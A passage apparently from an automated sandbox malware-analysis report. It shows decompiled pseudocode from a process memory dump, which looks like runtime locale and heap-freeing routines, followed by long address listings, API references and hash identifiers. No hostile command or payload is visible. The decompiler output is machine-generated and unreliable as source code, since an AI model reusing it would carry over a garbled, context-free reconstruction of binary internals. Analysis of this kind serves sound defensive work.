                                                                                                																				_v736 =  *((intOrPtr*)(_t450 + _t429));
                                                                                                																				_v748 =  *(_t429 + 0xa0 + _t365 * 4);
                                                                                                																				_v752 =  *(_t429 + 8);
                                                                                                																				_v716 = _t287 + 4;
                                                                                                																				_t289 = E00FA59A2(_t287 + 4, _v728,  &_v280);
                                                                                                																				_t476 = _t474 + 0xc;
                                                                                                																				__eflags = _t289;
                                                                                                																				if(_t289 != 0) {
                                                                                                																					_t290 = _v712;
                                                                                                																					_push(_t290);
                                                                                                																					_push(_t290);
                                                                                                																					_push(_t290);
                                                                                                																					_push(_t290);
                                                                                                																					_push(_t290);
                                                                                                																					E00F98DB9();
                                                                                                																					asm("int3");
                                                                                                																					_t292 =  *0xfd0f54; // 0x0
                                                                                                																					return _t292;
                                                                                                																				} else {
                                                                                                																					__eflags = _v280 - 0x43;
                                                                                                																					 *((intOrPtr*)(_t450 + _t429)) = _v716;
                                                                                                																					if(_v280 != 0x43) {
                                                                                                																						L100:
                                                                                                																						_t295 = E00FA35EC(_t365, _t429,  &_v708);
                                                                                                																						_t395 = _v712;
                                                                                                																					} else {
                                                                                                																						__eflags = _v278;
                                                                                                																						if(_v278 != 0) {
                                                                                                																							goto L100;
                                                                                                																						} else {
                                                                                                																							_t395 = _v712;
                                                                                                																							_t295 = _t395;
                                                                                                																						}
                                                                                                																					}
                                                                                                																					 *(_t429 + 0xa0 + _t365 * 4) = _t295;
                                                                                                																					__eflags = _t365 - 2;
                                                                                                																					if(_t365 != 2) {
                                                                                                																						__eflags = _t365 - 1;
                                                                                                																						if(_t365 != 1) {
                                                                                                																							__eflags = _t365 - 5;
                                                                                                																							if(_t365 == 5) {
                                                                                                																								 *((intOrPtr*)(_t429 + 0x14)) = _v720;
                                                                                                																							}
                                                                                                																						} else {
                                                                                                																							 *((intOrPtr*)(_t429 + 0x10)) = _v720;
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t454 = _v732;
                                                                                                																						_t420 = _t395;
                                                                                                																						_t405 = _t454;
                                                                                                																						 *(_t429 + 8) = _v720;
                                                                                                																						_v716 = _t454;
                                                                                                																						_v728 = _t454[8];
                                                                                                																						_v720 = _t454[9];
                                                                                                																						while(1) {
                                                                                                																							__eflags =  *(_t429 + 8) -  *_t405;
                                                                                                																							if( *(_t429 + 8) ==  *_t405) {
                                                                                                																								break;
                                                                                                																							}
                                                                                                																							_t455 = _v716;
                                                                                                																							_t420 = _t420 + 1;
                                                                                                																							_t327 =  *_t405;
                                                                                                																							 *_t455 = _v728;
                                                                                                																							_v720 = _t405[1];
                                                                                                																							_t405 = _t455 + 8;
                                                                                                																							 *((intOrPtr*)(_t455 + 4)) = _v720;
                                                                                                																							_t365 = _v744;
                                                                                                																							_t454 = _v732;
                                                                                                																							_v728 = _t327;
                                                                                                																							_v716 = _t405;
                                                                                                																							__eflags = _t420 - 5;
                                                                                                																							if(_t420 < 5) {
                                                                                                																								continue;
                                                                                                																							} else {
                                                                                                																							}
                                                                                                																							L108:
                                                                                                																							__eflags = _t420 - 5;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_t318 = E00FAB9ED(_t365, _t420, _t429, _t454, __eflags, _v712, 1, 0xfbc690, 0x7f,  &_v536,  *(_t429 + 8), 1);
                                                                                                																								_t476 = _t476 + 0x1c;
                                                                                                																								__eflags = _t318;
                                                                                                																								if(_t318 == 0) {
                                                                                                																									_t406 = _v712;
                                                                                                																								} else {
                                                                                                																									_t320 = _v712;
                                                                                                																									do {
                                                                                                																										 *(_t462 + _t320 * 2 - 0x20c) =  *(_t462 + _t320 * 2 - 0x20c) & 0x000001ff;
                                                                                                																										_t320 = _t320 + 1;
                                                                                                																										__eflags = _t320 - 0x7f;
                                                                                                																									} while (_t320 < 0x7f);
                                                                                                																									_t322 = E00F967B4( &_v536,  *0xfcf0bc, 0xfe);
                                                                                                																									_t476 = _t476 + 0xc;
                                                                                                																									__eflags = _t322;
                                                                                                																									_t406 = 0 | _t322 == 0x00000000;
                                                                                                																								}
                                                                                                																								_t454[1] = _t406;
                                                                                                																								 *_t454 =  *(_t429 + 8);
                                                                                                																							}
                                                                                                																							 *(_t429 + 0x18) = _t454[1];
                                                                                                																							goto L120;
                                                                                                																						}
                                                                                                																						__eflags = _t420;
                                                                                                																						if(_t420 != 0) {
                                                                                                																							 *_t454 =  *(_t454 + _t420 * 8);
                                                                                                																							_t454[1] =  *(_t454 + 4 + _t420 * 8);
                                                                                                																							 *(_t454 + _t420 * 8) = _v728;
                                                                                                																							 *(_t454 + 4 + _t420 * 8) = _v720;
                                                                                                																						}
                                                                                                																						goto L108;
                                                                                                																					}
                                                                                                																					L120:
                                                                                                																					_t296 = _t365 * 0xc;
                                                                                                																					_t198 = _t296 + 0xfbc718; // 0xf8176a
                                                                                                																					 *0xfb81fc(_t429);
                                                                                                																					_t298 =  *((intOrPtr*)( *_t198))();
                                                                                                																					_t398 = _v736;
                                                                                                																					__eflags = _t298;
                                                                                                																					if(_t298 == 0) {
                                                                                                																						__eflags = _t398 - 0xfcf198;
                                                                                                																						if(_t398 != 0xfcf198) {
                                                                                                																							_t453 = _t365 + _t365;
                                                                                                																							__eflags = _t453;
                                                                                                																							asm("lock xadd [eax], ecx");
                                                                                                																							if(_t453 != 0) {
                                                                                                																								goto L127;
                                                                                                																							} else {
                                                                                                																								E00FA609F( *((intOrPtr*)(_t429 + 0x28 + _t453 * 8)));
                                                                                                																								E00FA609F( *((intOrPtr*)(_t429 + 0x24 + _t453 * 8)));
                                                                                                																								E00FA609F( *(_t429 + 0xa0 + _t365 * 4));
                                                                                                																								_t401 = _v712;
                                                                                                																								 *(_v724 + _t429) = _t401;
                                                                                                																								 *(_t429 + 0xa0 + _t365 * 4) = _t401;
                                                                                                																							}
                                                                                                																						}
                                                                                                																						_t399 = _v740;
                                                                                                																						 *_t399 = 1;
                                                                                                																						 *((intOrPtr*)(_t429 + 0x28 + (_t365 + _t365) * 8)) = _t399;
                                                                                                																					} else {
                                                                                                																						 *((intOrPtr*)(_v724 + _t429)) = _t398;
                                                                                                																						E00FA609F( *(_t429 + 0xa0 + _t365 * 4));
                                                                                                																						 *(_t429 + 0xa0 + _t365 * 4) = _v748;
                                                                                                																						E00FA609F(_v740);
                                                                                                																						 *(_t429 + 8) = _v752;
                                                                                                																						goto L122;
                                                                                                																					}
                                                                                                																					goto L123;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			L123:
                                                                                                																			__eflags = _v16 ^ _t462;
                                                                                                																			return E00F80D7F(_v16 ^ _t462, _t420);
                                                                                                																		}
                                                                                                																		goto L131;
                                                                                                																	}
                                                                                                																	asm("sbb eax, eax");
                                                                                                																	_t283 = _t282 | 0x00000001;
                                                                                                																	__eflags = _t283;
                                                                                                																	goto L91;
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t329 = _t444 + _t444;
                                                                                                																__eflags = _t329 - 0x106;
                                                                                                																if(_t329 >= 0x106) {
                                                                                                																	E00F812E5();
                                                                                                																	goto L82;
                                                                                                																} else {
                                                                                                																	 *((short*)(_t460 + _t329 - 0x10c)) = 0;
                                                                                                																	_t331 =  &_v276;
                                                                                                																	_push(_t331);
                                                                                                																	_push(_v456);
                                                                                                																	_push(_t425);
                                                                                                																	L83();
                                                                                                																	_t382 = _v452;
                                                                                                																	_t469 = _t472 + 0xc;
                                                                                                																	__eflags = _t331;
                                                                                                																	if(_t331 != 0) {
                                                                                                																		_t382 = _t382 + 1;
                                                                                                																		_v452 = _t382;
                                                                                                																	}
                                                                                                																	L54:
                                                                                                																	_t441 = _t360 + _t444 * 2;
                                                                                                																	_t267 =  *_t441 & 0x0000ffff;
                                                                                                																	_t420 = _t267;
                                                                                                																	__eflags = _t267;
                                                                                                																	if(_t267 != 0) {
                                                                                                																		_t441 = _t441 + 2;
                                                                                                																		__eflags = _t441;
                                                                                                																		_t420 =  *_t441 & 0x0000ffff;
                                                                                                																	}
                                                                                                																	__eflags = _t420;
                                                                                                																	if(_t420 != 0) {
                                                                                                																		continue;
                                                                                                																	} else {
                                                                                                																		__eflags = _t382;
                                                                                                																		if(__eflags != 0) {
                                                                                                																			goto L79;
                                                                                                																		} else {
                                                                                                																			break;
                                                                                                																		}
                                                                                                																		goto L80;
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t332 = 0x3b;
                                                                                                														__eflags =  *_t360 - _t332;
                                                                                                														if( *_t360 != _t332) {
                                                                                                															break;
                                                                                                														} else {
                                                                                                															goto L48;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											goto L131;
                                                                                                										}
                                                                                                										goto L80;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						__eflags = _t441;
                                                                                                						if(_t441 != 0) {
                                                                                                							_push(_t441);
                                                                                                							_push(_t248);
                                                                                                							_push(_t425);
                                                                                                							L83();
                                                                                                						}
                                                                                                						L80:
                                                                                                						__eflags = _v12 ^ _t460;
                                                                                                						return E00F80D7F(_v12 ^ _t460, _t420);
                                                                                                					}
                                                                                                				}
                                                                                                				L131:
                                                                                                			}







































































































































                                                                                                0x00fa3d83
                                                                                                0x00fa3d86
                                                                                                0x00fa3d88
                                                                                                0x00fa3d8b
                                                                                                0x00fa3d8c
                                                                                                0x00fa3d95
                                                                                                0x00fa3d9d
                                                                                                0x00fa3d9f
                                                                                                0x00fa3da1
                                                                                                0x00fa3da4
                                                                                                0x00fa3ec1
                                                                                                0x00fa3ec6
                                                                                                0x00fa3daa
                                                                                                0x00fa3daa
                                                                                                0x00fa3dab
                                                                                                0x00fa3dab
                                                                                                0x00fa3dae
                                                                                                0x00fa3db1
                                                                                                0x00fa3db3
                                                                                                0x00fa3db6
                                                                                                0x00fa3db9
                                                                                                0x00fa3dbb
                                                                                                0x00fa3dbe
                                                                                                0x00fa3dc3
                                                                                                0x00fa3dd1
                                                                                                0x00fa3ddb
                                                                                                0x00fa3dde
                                                                                                0x00fa3de1
                                                                                                0x00fa3de1
                                                                                                0x00fa3dec
                                                                                                0x00fa3df1
                                                                                                0x00fa3df6
                                                                                                0x00000000
                                                                                                0x00fa3dfc
                                                                                                0x00fa3dff
                                                                                                0x00fa3dff
                                                                                                0x00fa3e02
                                                                                                0x00fa3e04
                                                                                                0x00fa3e07
                                                                                                0x00fa3e09
                                                                                                0x00fa3e09
                                                                                                0x00fa3e09
                                                                                                0x00fa3e0c
                                                                                                0x00fa3e0c
                                                                                                0x00fa3e0c
                                                                                                0x00fa3e12
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa3e17
                                                                                                0x00fa3e2e
                                                                                                0x00fa3e2e
                                                                                                0x00fa3e19
                                                                                                0x00fa3e19
                                                                                                0x00fa3e21
                                                                                                0x00000000
                                                                                                0x00fa3e23
                                                                                                0x00fa3e23
                                                                                                0x00fa3e26
                                                                                                0x00fa3e2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa3e2c
                                                                                                0x00fa3e21
                                                                                                0x00fa3e37
                                                                                                0x00fa3e37
                                                                                                0x00fa3e3c
                                                                                                0x00fa3e41
                                                                                                0x00fa3e45
                                                                                                0x00fa3e51
                                                                                                0x00fa3e54
                                                                                                0x00fa3e57
                                                                                                0x00fa3e61
                                                                                                0x00fa3e69
                                                                                                0x00fa3e71
                                                                                                0x00000000
                                                                                                0x00fa3e77
                                                                                                0x00fa3e7b
                                                                                                0x00fa3ec8
                                                                                                0x00fa3ed1
                                                                                                0x00fa3ed4
                                                                                                0x00fa3ed6
                                                                                                0x00fa3eda
                                                                                                0x00fa3ede
                                                                                                0x00fa3ee3
                                                                                                0x00fa3ee8
                                                                                                0x00fa3ede
                                                                                                0x00fa3eec
                                                                                                0x00fa3eee
                                                                                                0x00fa3ef0
                                                                                                0x00fa3ef4
                                                                                                0x00fa3ef5
                                                                                                0x00fa3efa
                                                                                                0x00fa3eff
                                                                                                0x00fa3ef5
                                                                                                0x00fa3f02
                                                                                                0x00fa3f05
                                                                                                0x00fa3f08
                                                                                                0x00fa3f0b
                                                                                                0x00fa3f0e
                                                                                                0x00fa3e7d
                                                                                                0x00fa3e80
                                                                                                0x00fa3e83
                                                                                                0x00fa3e85
                                                                                                0x00fa3e89
                                                                                                0x00fa3e8d
                                                                                                0x00fa3e92
                                                                                                0x00fa3e97
                                                                                                0x00fa3e8d
                                                                                                0x00fa3e9d
                                                                                                0x00fa3e9f
                                                                                                0x00fa3ea4
                                                                                                0x00fa3ea9
                                                                                                0x00fa3eae
                                                                                                0x00fa3ea4
                                                                                                0x00fa3eaf
                                                                                                0x00fa3eb3
                                                                                                0x00fa3eb3
                                                                                                0x00fa3eb6
                                                                                                0x00fa3eba
                                                                                                0x00fa3ebd
                                                                                                0x00fa3ebd
                                                                                                0x00000000
                                                                                                0x00fa3ec0
                                                                                                0x00000000
                                                                                                0x00fa3e71
                                                                                                0x00fa3e32
                                                                                                0x00fa3e34
                                                                                                0x00fa3e34
                                                                                                0x00000000
                                                                                                0x00fa3e34
                                                                                                0x00fa3f15
                                                                                                0x00fa3f16
                                                                                                0x00fa3f17
                                                                                                0x00fa3f18
                                                                                                0x00fa3f19
                                                                                                0x00fa3f1a
                                                                                                0x00fa3f1f
                                                                                                0x00fa3f22
                                                                                                0x00fa3f23
                                                                                                0x00fa3f25
                                                                                                0x00fa3f2b
                                                                                                0x00fa3f32
                                                                                                0x00fa3f35
                                                                                                0x00fa3f38
                                                                                                0x00fa3f39
                                                                                                0x00fa3f3a
                                                                                                0x00fa3f3d
                                                                                                0x00fa3f3e
                                                                                                0x00fa3f41
                                                                                                0x00fa3f47
                                                                                                0x00fa3f49
                                                                                                0x00fa3f6e
                                                                                                0x00fa3f78
                                                                                                0x00fa3f7e
                                                                                                0x00fa3f80
                                                                                                0x00fa3f86
                                                                                                0x00fa3f88
                                                                                                0x00fa41e2
                                                                                                0x00fa41e3
                                                                                                0x00000000
                                                                                                0x00fa3f8e
                                                                                                0x00fa3f8e
                                                                                                0x00fa3f92
                                                                                                0x00fa4100
                                                                                                0x00fa4117
                                                                                                0x00fa411c
                                                                                                0x00fa411f
                                                                                                0x00fa4121
                                                                                                0x00fa4127
                                                                                                0x00fa4129
                                                                                                0x00fa412c
                                                                                                0x00fa412e
                                                                                                0x00fa4134
                                                                                                0x00fa4134
                                                                                                0x00fa4136
                                                                                                0x00fa41bd
                                                                                                0x00fa41bd
                                                                                                0x00fa413c
                                                                                                0x00fa413c
                                                                                                0x00fa413e
                                                                                                0x00fa4144
                                                                                                0x00fa4147
                                                                                                0x00fa414a
                                                                                                0x00fa4150
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa4152
                                                                                                0x00fa4156
                                                                                                0x00fa417f
                                                                                                0x00fa4181
                                                                                                0x00fa4158
                                                                                                0x00fa4158
                                                                                                0x00fa415c
                                                                                                0x00fa4160
                                                                                                0x00fa4167
                                                                                                0x00fa416d
                                                                                                0x00000000
                                                                                                0x00fa416f
                                                                                                0x00fa416f
                                                                                                0x00fa4172
                                                                                                0x00fa4175
                                                                                                0x00fa417d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa417d
                                                                                                0x00fa416d
                                                                                                0x00fa418c
                                                                                                0x00fa418c
                                                                                                0x00fa418e
                                                                                                0x00fa41bc
                                                                                                0x00fa41bc
                                                                                                0x00000000
                                                                                                0x00fa4190
                                                                                                0x00fa4190
                                                                                                0x00fa4196
                                                                                                0x00fa4197
                                                                                                0x00fa4198
                                                                                                0x00fa4199
                                                                                                0x00fa419e
                                                                                                0x00fa41a4
                                                                                                0x00fa41a7
                                                                                                0x00fa41a9
                                                                                                0x00fa41b2
                                                                                                0x00fa41b4
                                                                                                0x00fa41ab
                                                                                                0x00fa41ab
                                                                                                0x00000000
                                                                                                0x00fa41ac
                                                                                                0x00fa41a9
                                                                                                0x00000000
                                                                                                0x00fa418e
                                                                                                0x00fa4185
                                                                                                0x00fa4187
                                                                                                0x00fa418a
                                                                                                0x00000000
                                                                                                0x00fa418a
                                                                                                0x00fa41c3
                                                                                                0x00fa41c3
                                                                                                0x00fa41c4
                                                                                                0x00fa41c7
                                                                                                0x00fa41cd
                                                                                                0x00fa41cd
                                                                                                0x00fa41d6
                                                                                                0x00fa41d8
                                                                                                0x00000000
                                                                                                0x00fa41da
                                                                                                0x00fa41da
                                                                                                0x00fa41dc
                                                                                                0x00000000
                                                                                                0x00fa41de
                                                                                                0x00fa41de
                                                                                                0x00fa41dc
                                                                                                0x00fa41d8
                                                                                                0x00000000
                                                                                                0x00fa3f98
                                                                                                0x00fa3f98
                                                                                                0x00fa3f9d
                                                                                                0x00000000
                                                                                                0x00fa3fa3
                                                                                                0x00fa3fa3
                                                                                                0x00fa3fa8
                                                                                                0x00000000
                                                                                                0x00fa3fae
                                                                                                0x00fa3fae
                                                                                                0x00fa3fb4
                                                                                                0x00fa3fb9
                                                                                                0x00fa3fbb
                                                                                                0x00fa3fc2
                                                                                                0x00fa3fc3
                                                                                                0x00fa3fc5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa3fcb
                                                                                                0x00fa3fcb
                                                                                                0x00fa3fcf
                                                                                                0x00fa3fd5
                                                                                                0x00000000
                                                                                                0x00fa3fdb
                                                                                                0x00fa3fdd
                                                                                                0x00fa3fde
                                                                                                0x00fa3fe1
                                                                                                0x00000000
                                                                                                0x00fa3fe7
                                                                                                0x00fa3fe7
                                                                                                0x00fa3fed
                                                                                                0x00fa3ff2
                                                                                                0x00fa3ffc
                                                                                                0x00fa4000
                                                                                                0x00fa4005
                                                                                                0x00fa4008
                                                                                                0x00fa400a
                                                                                                0x00000000
                                                                                                0x00fa400c
                                                                                                0x00fa400c
                                                                                                0x00fa400e
                                                                                                0x00fa4011
                                                                                                0x00fa4011
                                                                                                0x00fa4014
                                                                                                0x00fa4017
                                                                                                0x00fa4017
                                                                                                0x00fa4022
                                                                                                0x00fa4024
                                                                                                0x00fa4026
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa4026
                                                                                                0x00000000
                                                                                                0x00fa4028
                                                                                                0x00fa4028
                                                                                                0x00fa402e
                                                                                                0x00fa4031
                                                                                                0x00fa4031
                                                                                                0x00fa403f
                                                                                                0x00fa4048
                                                                                                0x00fa404d
                                                                                                0x00fa4053
                                                                                                0x00fa4056
                                                                                                0x00fa4057
                                                                                                0x00fa4059
                                                                                                0x00fa4067
                                                                                                0x00fa4067
                                                                                                0x00fa406e
                                                                                                0x00fa40cf
                                                                                                0x00000000
                                                                                                0x00fa4070
                                                                                                0x00fa4070
                                                                                                0x00fa407e
                                                                                                0x00fa4083
                                                                                                0x00fa4086
                                                                                                0x00fa4088
                                                                                                0x00fa41ff
                                                                                                0x00fa4201
                                                                                                0x00fa4202
                                                                                                0x00fa4203
                                                                                                0x00fa4204
                                                                                                0x00fa4205
                                                                                                0x00fa4206
                                                                                                0x00fa420b
                                                                                                0x00fa420e
                                                                                                0x00fa420f
                                                                                                0x00fa4217
                                                                                                0x00fa421e
                                                                                                0x00fa4221
                                                                                                0x00fa4222
                                                                                                0x00fa4225
                                                                                                0x00fa4229
                                                                                                0x00fa422a
                                                                                                0x00fa422d
                                                                                                0x00fa423d
                                                                                                0x00fa4260
                                                                                                0x00fa4265
                                                                                                0x00fa4268
                                                                                                0x00fa426a
                                                                                                0x00fa4542
                                                                                                0x00fa4542
                                                                                                0x00000000
                                                                                                0x00fa4270
                                                                                                0x00fa4270
                                                                                                0x00fa4273
                                                                                                0x00fa4273
                                                                                                0x00fa4276
                                                                                                0x00fa427c
                                                                                                0x00fa4282
                                                                                                0x00fa4285
                                                                                                0x00fa4287
                                                                                                0x00fa428a
                                                                                                0x00fa4291
                                                                                                0x00fa4294
                                                                                                0x00fa429a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa429c
                                                                                                0x00fa42a0
                                                                                                0x00fa42c9
                                                                                                0x00fa42c9
                                                                                                0x00fa42a2
                                                                                                0x00fa42a2
                                                                                                0x00fa42a6
                                                                                                0x00fa42aa
                                                                                                0x00fa42b1
                                                                                                0x00fa42b7
                                                                                                0x00000000
                                                                                                0x00fa42b9
                                                                                                0x00fa42b9
                                                                                                0x00fa42bc
                                                                                                0x00fa42bf
                                                                                                0x00fa42c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa42c7
                                                                                                0x00fa42b7
                                                                                                0x00fa42d6
                                                                                                0x00fa42d6
                                                                                                0x00fa42d8
                                                                                                0x00fa42e1
                                                                                                0x00fa42e7
                                                                                                0x00fa42ea
                                                                                                0x00fa42ea
                                                                                                0x00fa42ed
                                                                                                0x00fa42f0
                                                                                                0x00fa42f0
                                                                                                0x00fa4300
                                                                                                0x00fa430e
                                                                                                0x00fa4313
                                                                                                0x00fa431a
                                                                                                0x00fa431c
                                                                                                0x00000000
                                                                                                0x00fa4322
                                                                                                0x00fa4328
                                                                                                0x00fa4335
                                                                                                0x00fa433e
                                                                                                0x00fa4351
                                                                                                0x00fa4358
                                                                                                0x00fa435d
                                                                                                0x00fa4360
                                                                                                0x00fa4362
                                                                                                0x00fa45c4
                                                                                                0x00fa45ca
                                                                                                0x00fa45cb
                                                                                                0x00fa45cc
                                                                                                0x00fa45cd
                                                                                                0x00fa45ce
                                                                                                0x00fa45cf
                                                                                                0x00fa45d4
                                                                                                0x00fa45d5
                                                                                                0x00fa45db
                                                                                                0x00fa4368
                                                                                                0x00fa4368
                                                                                                0x00fa4376
                                                                                                0x00fa4379
                                                                                                0x00fa438f
                                                                                                0x00fa4396
                                                                                                0x00fa439c
                                                                                                0x00fa437b
                                                                                                0x00fa437b
                                                                                                0x00fa4383
                                                                                                0x00000000
                                                                                                0x00fa4385
                                                                                                0x00fa4385
                                                                                                0x00fa438b
                                                                                                0x00fa438b
                                                                                                0x00fa4383
                                                                                                0x00fa43a2
                                                                                                0x00fa43a9
                                                                                                0x00fa43ac
                                                                                                0x00fa44cc
                                                                                                0x00fa44cf
                                                                                                0x00fa44dc
                                                                                                0x00fa44df
                                                                                                0x00fa44e7
                                                                                                0x00fa44e7
                                                                                                0x00fa44d1
                                                                                                0x00fa44d7
                                                                                                0x00fa44d7
                                                                                                0x00fa43b2
                                                                                                0x00fa43b2
                                                                                                0x00fa43b8
                                                                                                0x00fa43c0
                                                                                                0x00fa43c2
                                                                                                0x00fa43c5
                                                                                                0x00fa43ce
                                                                                                0x00fa43d7
                                                                                                0x00fa43dd
                                                                                                0x00fa43e0
                                                                                                0x00fa43e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa43e4
                                                                                                0x00fa43ea
                                                                                                0x00fa43eb
                                                                                                0x00fa43f6
                                                                                                0x00fa43fe
                                                                                                0x00fa4406
                                                                                                0x00fa4409
                                                                                                0x00fa440c
                                                                                                0x00fa4412
                                                                                                0x00fa4418
                                                                                                0x00fa441e
                                                                                                0x00fa4424
                                                                                                0x00fa4427
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa4429
                                                                                                0x00fa444e
                                                                                                0x00fa444e
                                                                                                0x00fa4451
                                                                                                0x00fa446e
                                                                                                0x00fa4473
                                                                                                0x00fa4476
                                                                                                0x00fa4478
                                                                                                0x00fa44b6
                                                                                                0x00fa447a
                                                                                                0x00fa447a
                                                                                                0x00fa4480
                                                                                                0x00fa4485
                                                                                                0x00fa448d
                                                                                                0x00fa448e
                                                                                                0x00fa448e
                                                                                                0x00fa44a5
                                                                                                0x00fa44ac
                                                                                                0x00fa44af
                                                                                                0x00fa44b1
                                                                                                0x00fa44b1
                                                                                                0x00fa44bc
                                                                                                0x00fa44c2
                                                                                                0x00fa44c2
                                                                                                0x00fa44c7
                                                                                                0x00000000
                                                                                                0x00fa44c7
                                                                                                0x00fa442b
                                                                                                0x00fa442d
                                                                                                0x00fa4432
                                                                                                0x00fa4438
                                                                                                0x00fa4441
                                                                                                0x00fa444a
                                                                                                0x00fa444a
                                                                                                0x00000000
                                                                                                0x00fa442d
                                                                                                0x00fa44ea
                                                                                                0x00fa44ea
                                                                                                0x00fa44ee
                                                                                                0x00fa44f6
                                                                                                0x00fa44fc
                                                                                                0x00fa44ff
                                                                                                0x00fa4505
                                                                                                0x00fa4507
                                                                                                0x00fa4555
                                                                                                0x00fa455b
                                                                                                0x00fa4562
                                                                                                0x00fa4562
                                                                                                0x00fa4568
                                                                                                0x00fa456c
                                                                                                0x00000000
                                                                                                0x00fa456e
                                                                                                0x00fa4572
                                                                                                0x00fa457b
                                                                                                0x00fa4587
                                                                                                0x00fa4595
                                                                                                0x00fa459b
                                                                                                0x00fa459e
                                                                                                0x00fa459e
                                                                                                0x00fa456c
                                                                                                0x00fa45ad
                                                                                                0x00fa45b5
                                                                                                0x00fa45be
                                                                                                0x00fa4509
                                                                                                0x00fa450f
                                                                                                0x00fa4519
                                                                                                0x00fa452b
                                                                                                0x00fa4532
                                                                                                0x00fa453f
                                                                                                0x00000000
                                                                                                0x00fa453f
                                                                                                0x00000000
                                                                                                0x00fa4507
                                                                                                0x00fa4362
                                                                                                0x00fa42da
                                                                                                0x00fa4544
                                                                                                0x00fa4549
                                                                                                0x00fa4554
                                                                                                0x00fa4554
                                                                                                0x00000000
                                                                                                0x00fa42d8
                                                                                                0x00fa42d1
                                                                                                0x00fa42d3
                                                                                                0x00fa42d3
                                                                                                0x00000000
                                                                                                0x00fa42d3
                                                                                                0x00fa408e
                                                                                                0x00fa408e
                                                                                                0x00fa4091
                                                                                                0x00fa4096
                                                                                                0x00fa41fa
                                                                                                0x00000000
                                                                                                0x00fa409c
                                                                                                0x00fa409e
                                                                                                0x00fa40a6
                                                                                                0x00fa40ac
                                                                                                0x00fa40ad
                                                                                                0x00fa40b3
                                                                                                0x00fa40b4
                                                                                                0x00fa40b9
                                                                                                0x00fa40bf
                                                                                                0x00fa40c2
                                                                                                0x00fa40c4
                                                                                                0x00fa40c6
                                                                                                0x00fa40c7
                                                                                                0x00fa40c7
                                                                                                0x00fa40d5
                                                                                                0x00fa40d5
                                                                                                0x00fa40d8
                                                                                                0x00fa40db
                                                                                                0x00fa40dd
                                                                                                0x00fa40e0
                                                                                                0x00fa40e2
                                                                                                0x00fa40e2
                                                                                                0x00fa40e5
                                                                                                0x00fa40e5
                                                                                                0x00fa40e8
                                                                                                0x00fa40eb
                                                                                                0x00000000
                                                                                                0x00fa40f1
                                                                                                0x00fa40f1
                                                                                                0x00fa40f3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa40f3
                                                                                                0x00fa40eb
                                                                                                0x00fa4096
                                                                                                0x00fa4088
                                                                                                0x00fa405b
                                                                                                0x00fa405d
                                                                                                0x00fa405e
                                                                                                0x00fa4061
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa4061
                                                                                                0x00fa4059
                                                                                                0x00fa3fe1
                                                                                                0x00000000
                                                                                                0x00fa3fd5
                                                                                                0x00000000
                                                                                                0x00fa40f9
                                                                                                0x00fa3fa8
                                                                                                0x00fa3f9d
                                                                                                0x00fa3f92
                                                                                                0x00fa3f4b
                                                                                                0x00fa3f4b
                                                                                                0x00fa3f4d
                                                                                                0x00fa3f4f
                                                                                                0x00fa3f50
                                                                                                0x00fa3f51
                                                                                                0x00fa3f52
                                                                                                0x00fa3f57
                                                                                                0x00fa41e9
                                                                                                0x00fa41ee
                                                                                                0x00fa41f9
                                                                                                0x00fa41f9
                                                                                                0x00fa3f49
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA60D9: HeapAlloc.KERNEL32(00000000,?,00000004,?,00FAD660,?,00000000,?,00FA46B9,?,00000004,00000000,?,?,?,00FA2EC1), ref: 00FA610B
                                                                                                • _free.LIBCMT ref: 00FA3E92
                                                                                                • _free.LIBCMT ref: 00FA3EA9
                                                                                                • _free.LIBCMT ref: 00FA3EC8
                                                                                                • _free.LIBCMT ref: 00FA3EE3
                                                                                                • _free.LIBCMT ref: 00FA3EFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1835388192-0
                                                                                                • Opcode ID: a80678a15916b8e198ea8ce41db9929aca9d70c8f253ec86512b9d4fec105b64
                                                                                                • Instruction ID: b4fa81b7a0b83ce20724ee2f4419eaf266731d094d916925ff7f692d7d16ebb1
                                                                                                • Opcode Fuzzy Hash: a80678a15916b8e198ea8ce41db9929aca9d70c8f253ec86512b9d4fec105b64
                                                                                                • Instruction Fuzzy Hash: E551B1B2E00304AFDB20DF69DC81B6AB7F5EF56720B144569F809D7251E735EA05EB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00F7B720(void* __edx, void* __edi, void* __esi, void* __fp0, signed short _a4) {
                                                                                                				signed short _v8;
